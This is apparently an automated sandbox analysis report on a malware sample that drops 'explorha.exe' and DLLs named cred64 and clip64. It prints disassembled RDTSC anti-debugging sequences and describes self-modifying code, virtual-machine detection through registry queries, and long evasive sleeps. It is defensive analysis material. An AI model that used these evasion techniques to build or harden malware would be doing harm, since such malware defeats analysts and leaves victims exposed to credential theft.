Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE083D second address: 4EE087A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB16C743A57h 0x00000009 and eax, 5526D65Eh 0x0000000f jmp 00007FB16C743A59h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE087A second address: 4EE088C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 ror eax, cl 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov eax, 530A633Bh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE088C second address: 4EE08A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16C743A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE08A7 second address: 4EE08B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 271C27CCh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE08B1 second address: 4EE08B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE08B7 second address: 4EE08BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE08BB second address: 4EE08CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c mov esi, eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 xor esi, dword ptr [00CE4014h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e call 00007FB170982BBCh 0x00000023 push FFFFFFFEh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE08CE second address: 4EE08D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE08D2 second address: 4EE08D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE08D8 second address: 4EE08DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE08DE second address: 4EE08ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE08ED second address: 4EE08F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE08F3 second address: 4EE08F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE08F9 second address: 4EE08FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4EE08FD second address: 4EE091E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FB170982BF5h 0x00000010 mov edi, edi 0x00000012 pushad 0x00000013 jmp 00007FB16C743A4Ah 0x00000018 movzx esi, di 0x0000001b popad 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E90021 second address: 4E9003E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D3ACA50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e push eax 0x0000000f push edx 0x00000010 mov eax, edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E9003E second address: 4E9004F instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov ax, dx 0x0000000e mov esi, edx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E9004F second address: 4E9006A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB16D3ACA57h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E9006A second address: 4E9006E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E9006E second address: 4E900BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FB16D3ACA55h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov al, C1h 0x00000013 mov cx, bx 0x00000016 popad 0x00000017 and esp, FFFFFFF8h 0x0000001a jmp 00007FB16D3ACA4Bh 0x0000001f xchg eax, ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FB16D3ACA55h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E900BB second address: 4E90157 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16C743A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ecx, ebx 0x0000000d push ebx 0x0000000e pushfd 0x0000000f jmp 00007FB16C743A56h 0x00000014 or cx, D548h 0x00000019 jmp 00007FB16C743A4Bh 0x0000001e popfd 0x0000001f pop ecx 0x00000020 popad 0x00000021 xchg eax, ecx 0x00000022 pushad 0x00000023 movsx edi, si 0x00000026 movzx esi, bx 0x00000029 popad 0x0000002a push ebp 0x0000002b pushad 0x0000002c mov ebx, esi 0x0000002e pushfd 0x0000002f jmp 00007FB16C743A50h 0x00000034 or esi, 1B873AD8h 0x0000003a jmp 00007FB16C743A4Bh 0x0000003f popfd 0x00000040 popad 0x00000041 mov dword ptr [esp], ebx 0x00000044 pushad 0x00000045 push eax 0x00000046 mov ax, dx 0x00000049 pop ebx 0x0000004a push ecx 0x0000004b jmp 00007FB16C743A53h 0x00000050 pop ecx 0x00000051 popad 0x00000052 mov ebx, dword ptr [ebp+10h] 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E90157 second address: 4E9015C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E9015C second address: 4E90162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E90162 second address: 4E90166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E90166 second address: 4E901B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FB16C743A50h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ebx, esi 0x00000014 pushfd 0x00000015 jmp 00007FB16C743A58h 0x0000001a xor si, 8128h 0x0000001f jmp 00007FB16C743A4Bh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E901B0 second address: 4E901C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB16D3ACA54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E901C8 second address: 4E901CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E901CC second address: 4E901DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E901DB second address: 4E90235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call 00007FB16C743A55h 0x0000000a pushfd 0x0000000b jmp 00007FB16C743A50h 0x00000010 or eax, 69E84918h 0x00000016 jmp 00007FB16C743A4Bh 0x0000001b popfd 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov esi, dword ptr [ebp+08h] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007FB16C743A50h 0x00000029 pop ecx 0x0000002a movsx ebx, si 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E90235 second address: 4E90256 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D3ACA4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB16D3ACA4Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E9032D second address: 4E90411 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 38EB102Eh 0x00000008 pushfd 0x00000009 jmp 00007FB16C743A4Fh 0x0000000e or esi, 1DD1E0DEh 0x00000014 jmp 00007FB16C743A59h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d or edx, dword ptr [ebp+0Ch] 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FB16C743A4Ch 0x00000027 adc cl, FFFFFFD8h 0x0000002a jmp 00007FB16C743A4Bh 0x0000002f popfd 0x00000030 jmp 00007FB16C743A58h 0x00000035 popad 0x00000036 test edx, 61000000h 0x0000003c pushad 0x0000003d mov bx, ax 0x00000040 call 00007FB16C743A4Ah 0x00000045 jmp 00007FB16C743A52h 0x0000004a pop eax 0x0000004b popad 0x0000004c jne 00007FB1DEC61D05h 0x00000052 jmp 00007FB16C743A51h 0x00000057 test byte ptr [esi+48h], 00000001h 0x0000005b jmp 00007FB16C743A4Eh 0x00000060 jne 00007FB1DEC61CF5h 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007FB16C743A57h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E90411 second address: 4E90472 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB16D3ACA4Fh 0x00000009 and esi, 46EEF06Eh 0x0000000f jmp 00007FB16D3ACA59h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FB16D3ACA50h 0x0000001b adc ax, 3BE8h 0x00000020 jmp 00007FB16D3ACA4Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 test bl, 00000007h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E90472 second address: 4E90476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E90476 second address: 4E9047C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E9047C second address: 4E90482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E90482 second address: 4E90486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E80772 second address: 4E8078A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB16C743A54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E8078A second address: 4E80861 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D3ACA4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007FB16D3ACA56h 0x00000013 mov ebp, esp 0x00000015 jmp 00007FB16D3ACA50h 0x0000001a and esp, FFFFFFF8h 0x0000001d pushad 0x0000001e call 00007FB16D3ACA4Eh 0x00000023 call 00007FB16D3ACA52h 0x00000028 pop eax 0x00000029 pop edx 0x0000002a pushfd 0x0000002b jmp 00007FB16D3ACA50h 0x00000030 adc eax, 6CF8EED8h 0x00000036 jmp 00007FB16D3ACA4Bh 0x0000003b popfd 0x0000003c popad 0x0000003d xchg eax, ebx 0x0000003e pushad 0x0000003f push ecx 0x00000040 pushfd 0x00000041 jmp 00007FB16D3ACA4Bh 0x00000046 sbb ecx, 1560199Eh 0x0000004c jmp 00007FB16D3ACA59h 0x00000051 popfd 0x00000052 pop eax 0x00000053 movsx edi, cx 0x00000056 popad 0x00000057 push eax 0x00000058 jmp 00007FB16D3ACA53h 0x0000005d xchg eax, ebx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 mov bh, BAh 0x00000063 push esi 0x00000064 pop edx 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E80861 second address: 4E80867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E80867 second address: 4E8086B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E8086B second address: 4E80893 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FB16C743A4Ch 0x0000000e mov dword ptr [esp], esi 0x00000011 pushad 0x00000012 movsx ebx, ax 0x00000015 popad 0x00000016 mov esi, dword ptr [ebp+08h] 0x00000019 pushad 0x0000001a mov dx, ax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E80893 second address: 4E80897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E80897 second address: 4E808AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ebx, 00000000h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB16C743A4Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E808AE second address: 4E808DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D3ACA59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB16D3ACA4Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E808DC second address: 4E8094E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 70E2h 0x00000007 mov ax, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007FB1DEC694EBh 0x00000013 jmp 00007FB16C743A55h 0x00000018 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001f jmp 00007FB16C743A4Eh 0x00000024 mov ecx, esi 0x00000026 jmp 00007FB16C743A50h 0x0000002b je 00007FB1DEC694BEh 0x00000031 jmp 00007FB16C743A50h 0x00000036 test byte ptr [77436968h], 00000002h 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E8094E second address: 4E80952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E80952 second address: 4E8096F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16C743A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E8096F second address: 4E809AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FB1DF8D2483h 0x00000010 jmp 00007FB16D3ACA4Fh 0x00000015 mov edx, dword ptr [ebp+0Ch] 0x00000018 jmp 00007FB16D3ACA56h 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E809AB second address: 4E80A12 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FB16C743A4Fh 0x0000000c adc esi, 686F84BEh 0x00000012 jmp 00007FB16C743A59h 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007FB16C743A51h 0x0000001f xchg eax, ebx 0x00000020 jmp 00007FB16C743A4Eh 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FB16C743A4Ah 0x0000002f rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E80A12 second address: 4E80A18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E80A18 second address: 4E80A3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16C743A4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB16C743A4Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E80A3B second address: 4E80A81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D3ACA4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FB16D3ACA56h 0x0000000f push dword ptr [ebp+14h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007FB16D3ACA58h 0x0000001a pop eax 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: 4E90EC8 second address: 4E90ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Special instruction interceptor: First address: CEEB09 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Special instruction interceptor: First address: E96EA8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 26EB09 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 416EA8 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Code function: 0_2_04F00BE2 rdtsc 0_2_04F00BE2
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 898 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 8016 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 9995 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6868 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2897 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\cred64[1].dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5272 Thread sleep count: 46 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5272 Thread sleep time: -92046s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 400 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 400 Thread sleep time: -86043s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6936 Thread sleep count: 126 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6936 Thread sleep time: -3780000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7868 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6800 Thread sleep count: 55 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6800 Thread sleep time: -110055s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5056 Thread sleep count: 898 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5056 Thread sleep time: -1796898s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5056 Thread sleep count: 8016 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5056 Thread sleep time: -16040016s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8100 Thread sleep count: 9995 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8100 Thread sleep time: -9995000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\MejqsB9tx9.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini Jump to behavior
